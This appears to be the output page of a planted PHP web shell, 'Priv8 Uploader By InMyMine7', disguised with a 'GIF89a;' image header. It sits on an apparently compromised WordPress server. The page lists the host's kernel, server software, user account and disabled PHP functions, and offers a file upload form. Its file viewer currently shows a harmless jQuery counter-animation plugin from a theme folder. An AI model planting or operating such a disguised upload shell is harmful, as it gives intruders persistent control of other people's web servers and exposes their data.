GIF89a;

Priv8 Uploader By InMyMine7

Linux server.fluxioninnovation.in 6.8.0-1041-oracle #42~22.04.1-Ubuntu SMP Fri Dec 5 16:59:35 UTC 2025 aarch64
root@viangans
HEX
Server: Apache/2.4.65 (Ubuntu) mod_fcgid/2.3.9 OpenSSL/3.0.2
System: Linux server.fluxioninnovation.in 6.8.0-1041-oracle #42~22.04.1-Ubuntu SMP Fri Dec 5 16:59:35 UTC 2025 aarch64
User: fluxionuser (1005)
PHP: 8.3.28
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,exec,system,passthru,shell_exec,proc_open,popen
Upload Files
File: /home/fluxionuser/web/kastudio.in/public_html/wp-content/themes/wp-blank/js/spincrement.js
/**
 * wp-bizone WordPress Theme, ordasvit.com
 * wp-bosling is distributed under the terms of the GNU GPL
 * Copyright: OrdaSvit, Andrey Kvasnevskiy, ordasvit.com
 */
!(function (t) {
    t.extend(t.easing, {
        spincrementEasing: function (t, a, e, n, r) {
            return a === r ? e + n : n * (-Math.pow(2, (-10 * a) / r) + 1) + e;
        },
    }),
        (t.fn.spincrement = function (a) {
            function e(t, a) {
                if (((t = t.toFixed(a)), a > 0 && "." !== r.decimalPoint && (t = t.replace(".", r.decimalPoint)), r.thousandSeparator)) for (; o.test(t);) t = t.replace(o, "$1" + r.thousandSeparator + "$2");
                return t;
            }
            var n = { from: 0, to: null, decimalPlaces: null, decimalPoint: ".", thousandSeparator: ",", duration: 1e3, leeway: 50, easing: "spincrementEasing", fade: !0, complete: null },
                r = t.extend(n, a),
                o = new RegExp(/^(-?[0-9]+)([0-9]{3})/);
            return this.each(function () {
                var a = t(this),
                    n = r.from;
                a.attr("data-from") && (n = parseFloat(a.attr("data-from")));
                var o;
                if (a.attr("data-to")) o = parseFloat(a.attr("data-to"));
                else if (null !== r.to) o = r.to;
                else {
                    var i = t.inArray(r.thousandSeparator, ["\\", "^", "$", "*", "+", "?", "."]) > -1 ? "\\" + r.thousandSeparator : r.thousandSeparator,
                        l = new RegExp(i, "g");
                    o = parseFloat(a.text().replace(l, ""));
                }
                var c = r.duration;
                r.leeway && (c += Math.round((r.duration * (2 * Math.random() - 1) * r.leeway) / 100));
                var s;
                if (a.attr("data-dp")) s = parseInt(a.attr("data-dp"), 10);
                else if (null !== r.decimalPlaces) s = r.decimalPlaces;
                else {
                    var d = a.text().indexOf(r.decimalPoint);
                    s = d > -1 ? a.text().length - (d + 1) : 0;
                }
                a.css("counter", n),
                    r.fade && a.css("opacity", 0.3),
                    a.animate(
                        { counter: o, opacity: 1 },
                        {
                            easing: r.easing,
                            duration: c,
                            step: function (t) {
                                a.html(e(t * o, s));
                            },
                            complete: function () {
                                a.css("counter", null), a.html(e(o, s)), r.complete && r.complete(a);
                            },
                        }
                    );
            });
        });
})(jQuery);